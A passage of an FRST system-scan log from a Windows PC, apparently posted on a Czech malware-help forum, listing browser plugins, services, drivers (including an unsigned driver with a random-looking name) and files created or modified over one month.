BHO-x32: Java(tm) Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\ssv.dll [2020-09-11] (Oracle America, Inc. -> Oracle Corporation)
BHO-x32: Java(tm) Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\jp2ssv.dll [2020-09-11] (Oracle America, Inc. -> Oracle Corporation)

Edge: 
======
Edge DefaultProfile: Default

FireFox:
========
FF DefaultProfile: omklf3yt.default
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\omklf3yt.default [2020-09-11]
FF Homepage: Mozilla\Firefox\Profiles\omklf3yt.default -> about:home
FF NewTab: Mozilla\Firefox\Profiles\omklf3yt.default -> about:newtab
FF ProfilePath: C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release [2020-09-12]
FF Session Restore: Mozilla\Firefox\Profiles\nh2u98jr.default-release -> is enabled.
FF Notifications: Mozilla\Firefox\Profiles\nh2u98jr.default-release -> hxxps://cs70.divokekmeny.cz
FF Extension: (Mozilla Official) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{14553439-2741-4e9d-b474-784f336f58c9} [2020-09-11] [not signed]
FF Extension: (Greasemonkey) - C:\Users\Milan\AppData\Roaming\Mozilla\Firefox\Profiles\nh2u98jr.default-release\Extensions\{e4a8a97b-f2ed-450b-b12d-ee082ba24781}.xpi [2020-03-18]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_433.dll [2020-09-08] (Adobe Inc. -> )
FF Plugin-x32: @java.com/DTPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\dtplugin\npDeployJava1.dll [2020-09-11] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.261.2 -> C:\Program Files (x86)\Java\jre1.8.0_261\bin\plugin2\npjp2.dll [2020-09-11] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=3 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @update.avgbrowser.com/AVG Browser;version=9 -> C:\Program Files (x86)\AVG\Browser\Update\1.8.1066.0\npAvgBrowserUpdate3.dll [2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
FF Plugin-x32: @videolan.org/vlc,version=3.0.10 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.11 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2020-06-04] (VideoLAN -> VideoLAN)

==================== Services (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 AdobeFlashPlayerUpdateSvc; C:\WINDOWS\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [335416 2020-09-08] (Adobe Inc. -> Adobe)
R2 AnyDesk; C:\Program Files (x86)\AnyDesk\AnyDesk.exe [3668944 2020-08-08] (philandro Software GmbH -> philandro Software GmbH)
S2 avg; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AVG Antivirus; C:\Program Files\AVG\Antivirus\AVGSvc.exe [354272 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 avgbIDSAgent; C:\Program Files\AVG\Antivirus\aswidsagent.exe [7823296 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 avgm; C:\Program Files (x86)\AVG\Browser\Update\AVGBrowserUpdate.exe [201984 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies)
S3 AVGSecureBrowserElevationService; C:\Program Files (x86)\AVG\Browser\Application\85.0.5675.85\elevation_service.exe [1343656 2020-08-31] (AVG Technologies USA, LLC -> AVG Technologies)
R2 AvgWscReporter; C:\Program Files\AVG\Antivirus\wsc_proxy.exe [110608 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R3 Disc Soft Ultra Bus Service; C:\Program Files\DAEMON Tools Ultra\DiscSoftBusServiceUltra.exe [6986096 2018-11-29] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 EpsonScanSvc; C:\WINDOWS\system32\EscSvc64.exe [145224 2019-09-19] (SEIKO EPSON CORPORATION -> Seiko Epson Corporation)
S3 WdNisSvc; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\NisSrv.exe [2169568 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
S3 WinDefend; C:\ProgramData\Microsoft\Windows Defender\platform\4.18.2007.8-0\MsMpEng.exe [128376 2020-08-05] (Microsoft Windows Publisher -> Microsoft Corporation)
R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
R0 avgArDisk; C:\WINDOWS\System32\drivers\avgArDisk.sys [37208 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgArPot; C:\WINDOWS\System32\drivers\avgArPot.sys [205952 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgbidsdriver; C:\WINDOWS\System32\drivers\avgbidsdriver.sys [235656 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbidsh; C:\WINDOWS\System32\drivers\avgbidsh.sys [195720 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbuniv; C:\WINDOWS\System32\drivers\avgbuniv.sys [61064 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgElam; C:\WINDOWS\System32\drivers\avgElam.sys [16320 2020-08-29] (Microsoft Windows Early Launch Anti-malware Publisher -> AVG Technologies CZ, s.r.o.)
R1 avgKbd; C:\WINDOWS\System32\drivers\avgKbd.sys [42840 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgMonFlt; C:\WINDOWS\System32\drivers\avgMonFlt.sys [175264 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgNetHub; C:\WINDOWS\System32\drivers\avgNetHub.sys [515600 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\WINDOWS\System32\drivers\avgRdr2.sys [109336 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgRvrt; C:\WINDOWS\System32\drivers\avgRvrt.sys [84912 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSnx; C:\WINDOWS\System32\drivers\avgSnx.sys [851664 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSP; C:\WINDOWS\System32\drivers\avgSP.sys [466816 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgStm; C:\WINDOWS\System32\drivers\avgStm.sys [217392 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgVmm; C:\WINDOWS\System32\drivers\avgVmm.sys [323848 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2020-01-09] (Microsoft Corporation) [File not signed]
R3 dtultrascsibus; C:\WINDOWS\System32\drivers\dtultrascsibus.sys [42256 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtultrausbbus; C:\WINDOWS\System32\drivers\dtultrausbbus.sys [59344 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [78216 2020-08-05] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [430320 2020-08-05] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [98520 2020-08-05] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-12 11:52 - 2020-09-12 11:52 - 000000000 ____D C:\Users\Milan\Desktop\FRST-OlderVersion
2020-09-11 22:10 - 2020-09-11 22:10 - 000000000 ____D C:\Users\Milan\AppData\Local\GHISLER
2020-09-11 21:45 - 2020-09-11 21:45 - 000014559 _____ C:\Users\Milan\Desktop\zoek-results.rar
2020-09-11 21:44 - 2020-09-11 21:44 - 000384234 _____ C:\Users\Milan\Desktop\zoek-results.txt
2020-09-11 21:35 - 2014-02-13 23:59 - 000024064 _____ C:\WINDOWS\zoek-delete.exe
2020-09-11 20:01 - 2020-09-11 21:21 - 000000000 ____D C:\zoek_backup
2020-09-11 20:00 - 2020-09-11 20:00 - 001790024 _____ (Malwarebytes) C:\Users\Milan\Desktop\JRT.exe
2020-09-11 19:59 - 2020-09-11 19:59 - 002038755 _____ C:\Users\Milan\Desktop\zoek.exe
2020-09-11 19:11 - 2020-09-11 19:14 - 000009114 _____ C:\Users\Milan\Desktop\Fixlog.txt
2020-09-11 16:31 - 2020-09-11 16:34 - 000000000 ____D C:\AdwCleaner
2020-09-11 16:30 - 2020-09-11 16:30 - 008414384 _____ (Malwarebytes) C:\Users\Milan\Desktop\AdwCleaner.exe
2020-09-11 14:30 - 2020-09-11 18:12 - 000037506 _____ C:\Users\Milan\Desktop\Addition.txt
2020-09-11 14:27 - 2020-09-12 11:53 - 000018781 _____ C:\Users\Milan\Desktop\FRST.txt
2020-09-11 14:27 - 2020-09-12 11:53 - 000000000 ____D C:\FRST
2020-09-11 14:27 - 2020-09-11 14:27 - 000000000 _____ C:\Users\Milan\Desktop\Nový textový dokument.txt
2020-09-11 14:24 - 2020-09-12 11:52 - 002297856 _____ (Farbar) C:\Users\Milan\Desktop\FRST64.exe
2020-09-09 07:11 - 2020-09-09 07:11 - 000000000 ____D C:\Users\Milan\AppData\Local\CrashDumps
2020-09-09 07:03 - 2020-09-09 07:03 - 001728079 _____ C:\Users\Milan\Downloads\pz_II_c_87_01.rar
2020-09-06 14:21 - 2020-09-06 15:02 - 733129592 _____ C:\Users\Milan\Downloads\Šifra mistra Leonarda super film cz dabing dvdrip.avi
2020-09-06 12:20 - 2020-09-06 13:13 - 932525132 _____ C:\Users\Milan\Downloads\Apocalipto.avi
2020-09-02 20:01 - 2020-09-02 20:01 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-09-02 15:58 - 2020-09-02 20:04 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-08-30 12:28 - 2020-08-30 14:19 - 1992979015 _____ C:\Users\Milan\Downloads\The.Debt.Collectors.2.2020.PROPER.1080p.WEBRip.x264-RARBG.mp4
2020-08-29 22:45 - 2020-09-10 15:06 - 000002375 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-09-10 15:06 - 000002340 _____ C:\Users\Public\Desktop\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-08-29 22:45 - 000003826 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Hourly)
2020-08-29 22:45 - 2020-08-29 22:45 - 000003242 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Logon)
2020-08-29 22:41 - 2020-08-29 22:41 - 000003468 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineUA
2020-08-29 22:41 - 2020-08-29 22:41 - 000003344 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineCore
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ___HD C:\$AV_AVG
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\AVG
2020-08-29 22:40 - 2020-08-29 22:45 - 000000000 ____D C:\Users\Milan\AppData\Local\Avg
2020-08-29 22:40 - 2020-08-29 22:40 - 000002075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000002063 _____ C:\Users\Public\Desktop\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Roaming\AVG
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Local\CEF
2020-08-29 22:39 - 2020-09-02 14:57 - 000004266 _____ C:\WINDOWS\system32\Tasks\Antivirus Emergency Update
2020-08-29 22:39 - 2020-08-29 22:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-08-29 22:38 - 2020-08-29 22:39 - 000323848 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000851664 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSnx.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000515600 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetHub.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000466816 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000336520 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2020-08-29 22:38 - 2020-08-29 22:38 - 000235656 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdriver.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000217392 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000205952 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArPot.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000195720 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsh.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000175264 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000109336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000084912 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000061064 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniv.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000042840 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgKbd.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000037208 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArDisk.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000016320 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgElam.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\Common Files\AVG
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\AVG
2020-08-29 22:37 - 2020-09-11 16:34 - 000000000 ____D C:\ProgramData\AVG
2020-08-29 22:37 - 2020-08-29 22:37 - 000271696 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Milan\Downloads\avg_antivirus_free_setup.exe
2020-08-29 18:07 - 2020-08-29 22:37 - 000000000 ____D C:\Program Files\M3PY0PHHSX
2020-08-29 17:53 - 2020-08-29 17:53 - 000025368 _____ (FsFilter Network) C:\WINDOWS\0246CDED558E.sys
2020-08-29 17:31 - 2020-09-11 16:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-08-29 17:29 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\oizjd
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\Program Files (x86)\Direct WAV MP3 Splitter
2020-08-27 23:00 - 2020-08-28 00:46 - 1959706735 _____ C:\Users\Milan\Downloads\Zeme.a.krev-Earth.and.Blood.2020.1080p.WEB.x264.DDP5.1.CZ.TITULKY-FCKR.mkv
2020-08-27 10:12 - 2020-08-27 11:16 - 1141266433 _____ C:\Users\Milan\Downloads\Ghosts.Of.War.2020.titl.ve filmu-kirikos1.mp4
2020-08-26 23:01 - 2020-08-29 16:26 - 000000000 ____D C:\Users\Milan\Desktop\Tanky
2020-08-24 09:09 - 2020-08-15 18:12 - 045761304 _____ C:\Users\Milan\Downloads\Maly_Modelarz_2005-04-06_-_Bismarck.rar
2020-08-15 17:41 - 2020-08-15 17:41 - 000000000 ____D C:\Users\Milan\Desktop\OH-13
2020-08-15 17:32 - 2020-08-15 17:32 - 006094091 _____ C:\Users\Milan\Downloads\Hrad Rokštejn.pdf
2020-08-15 08:34 - 2020-08-15 08:34 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-08-15 08:34 - 2020-08-10 10:38 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-08-15 08:34 - 2020-08-10 10:37 - 000905528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-08-15 08:06 - 2020-08-15 08:06 - 002510856 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll

==================== One month (modified) ==================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-12 11:51 - 2020-03-20 23:18 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-09-12 11:51 - 2019-03-19 06:52 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-09-11 22:17 - 2020-03-20 23:29 - 001694640 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-09-11 22:17 - 2019-03-19 13:55 - 000717182 _____ C:\WINDOWS\system32\perfh005.dat
2020-09-11 22:17 - 2019-03-19 13:55 - 000145262 _____ C:\WINDOWS\system32\perfc005.dat
2020-09-11 22:17 - 2019-03-19 06:50 - 000000000 ____D C:\WINDOWS\INF
2020-09-11 22:12 - 2020-03-20 23:49 - 000000000 ____D C:\Users\Milan\AppData\LocalLow\Mozilla
2020-09-11 22:11 - 2020-03-20 23:19 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-09-11 22:10 - 2020-03-21 00:32 - 000006617 _____ C:\ProgramData\DisplaySessionContainer1.log_backup1
2020-09-11 22:10 - 2020-03-20 23:40 - 000012995 _____ C:\ProgramData\NVDisplay.ContainerLocalSystem.log_backup1
2020-09-11 22:10 - 2020-03-20 23:40 - 000008675 _____ C:\ProgramData\NVDisplayContainerWatchdog.log_backup1
2020-09-11 22:10 - 2019-03-19 06:37 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-09-11 16:45 - 2020-03-21 08:09 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-09-11 16:45 - 2020-03-21 08:08 - 000000000 ____D C:\Program Files (x86)\Java
2020-09-11 16:42 - 2020-03-21 08:09 - 000166056 _____ (Oracle Corporation) C:\WINDOWS\SysWOW64\WindowsAccessBridge-32.dll
2020-09-11 16:34 - 2020-04-06 21:57 - 000006622 _____ C:\ProgramData\DisplaySessionContainer14.log_backup1
2020-09-11 07:15 - 2020-04-05 22:19 - 000006107 _____ C:\ProgramData\DisplaySessionContainer13.log_backup1
2020-09-11 06:46 - 2020-03-21 10:40 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2020-09-10 20:41 - 2020-04-04 23:09 - 000006115 _____ C:\ProgramData\DisplaySessionContainer12.log_backup1
2020-09-10 16:40 - 2020-06-07 10:48 - 000002436 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-09-10 16:40 - 2020-06-07 10:48 - 000002274 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-09-10 08:02 - 2020-04-04 00:12 - 000006119 _____ C:\ProgramData\DisplaySessionContainer11.log_backup1
2020-09-10 07:43 - 2020-05-31 14:59 - 000002178 _____ C:\Users\Milan\Desktop\JDownloader 2.lnk
2020-09-10 07:43 - 2020-03-28 17:28 - 000000958 _____ C:\Users\Milan\Desktop\Mockba to Berlin.lnk
2020-09-10 07:43 - 2020-03-21 14:38 - 000001080 _____ C:\Users\Milan\Desktop\SpeedFan.lnk
2020-09-09 20:32 - 2020-04-05 15:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\vlc
2020-09-09 20:32 - 2020-04-03 11:51 - 000006111 _____ C:\ProgramData\DisplaySessionContainer10.log_backup1
2020-09-09 08:42 - 2020-04-03 00:55 - 000006106 _____ C:\ProgramData\DisplaySessionContainer9.log_backup1
2020-09-09 07:58 - 2020-07-17 10:20 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka
2020-09-08 19:55 - 2020-03-27 09:09 - 000006118 _____ C:\ProgramData\DisplaySessionContainer8.log_backup1
2020-09-08 16:01 - 2020-03-30 11:51 - 000004612 _____ C:\WINDOWS\system32\Tasks\Adobe Flash Player NPAPI Notifier
2020-09-08 16:01 - 2019-03-19 06:56 - 000842296 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2020-09-08 16:01 - 2019-03-19 06:56 - 000175160 _____ (Adobe) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\SysWOW64\Macromed
2020-09-08 16:01 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\system32\Macromed
2020-09-08 08:24 - 2020-03-26 21:15 - 000006110 _____ C:\ProgramData\DisplaySessionContainer7.log_backup1
2020-09-07 20:23 - 2020-03-26 08:49 - 000006102 _____ C:\ProgramData\DisplaySessionContainer6.log_backup1
2020-09-07 07:56 - 2020-03-21 12:54 - 000006102 _____ C:\ProgramData\DisplaySessionContainer5.log_backup1
2020-09-06 16:33 - 2020-03-21 12:43 - 000006098 _____ C:\ProgramData\DisplaySessionContainer4.log_backup1
2020-09-04 20:52 - 2020-03-21 10:01 - 000006118 _____ C:\ProgramData\DisplaySessionContainer3.log_backup1
2020-09-04 20:28 - 2020-08-08 11:31 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (2)
2020-09-03 20:48 - 2020-03-20 23:40 - 000006106 _____ C:\ProgramData\DisplaySessionContainer2.log_backup1
2020-09-02 20:04 - 2020-03-20 23:49 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2020-09-02 20:01 - 2020-03-20 23:49 - 000001005 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-08-29 22:38 - 2019-03-19 06:52 - 000000000 ___HD C:\WINDOWS\ELAMBKUP
2020-08-29 22:34 - 2020-03-20 23:30 - 000000000 ____D C:\Users\Milan
2020-08-29 18:15 - 2019-03-19 06:52 - 000000000 ___HD C:\Program Files\WindowsApps
2020-08-29 18:14 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\registration
2020-08-29 17:33 - 2020-04-14 17:15 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Castlevania - The New Generation
2020-08-28 10:06 - 2020-06-07 10:48 - 000003584 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-08-28 10:06 - 2020-06-07 10:48 - 000003460 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-08-27 23:32 - 2019-03-19 06:52 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-08-26 11:40 - 2020-03-20 23:34 - 000003380 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1738925715-1269715944-3180472622-1001
2020-08-26 11:40 - 2020-03-20 23:34 - 000000000 ___RD C:\Users\Milan\OneDrive
2020-08-26 11:40 - 2020-03-20 23:30 - 000002365 _____ C:\Users\Milan\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2020-08-26 00:51 - 2020-04-11 00:56 - 000005712 _____ C:\ProgramData\DisplaySessionContainer18.log_backup1
2020-08-25 12:48 - 2020-04-09 21:49 - 000006093 _____ C:\ProgramData\DisplaySessionContainer17.log_backup1
2020-08-25 01:07 - 2020-04-08 22:17 - 000006094 _____ C:\ProgramData\DisplaySessionContainer16.log_backup1
2020-08-24 12:54 - 2020-04-07 21:57 - 000006093 _____ C:\ProgramData\DisplaySessionContainer15.log_backup1
2020-08-15 14:23 - 2020-08-08 20:33 - 000000000 ____D C:\Users\Milan\Desktop\Nová složka (3)
2020-08-15 08:06 - 2019-03-19 06:37 - 000000000 ____D C:\WINDOWS\CbsTemp

==================== SigCheck ============================

(There is no automatic fix for files that do not pass verification.)

==================== End of FRST.txt ========================

Odpovědět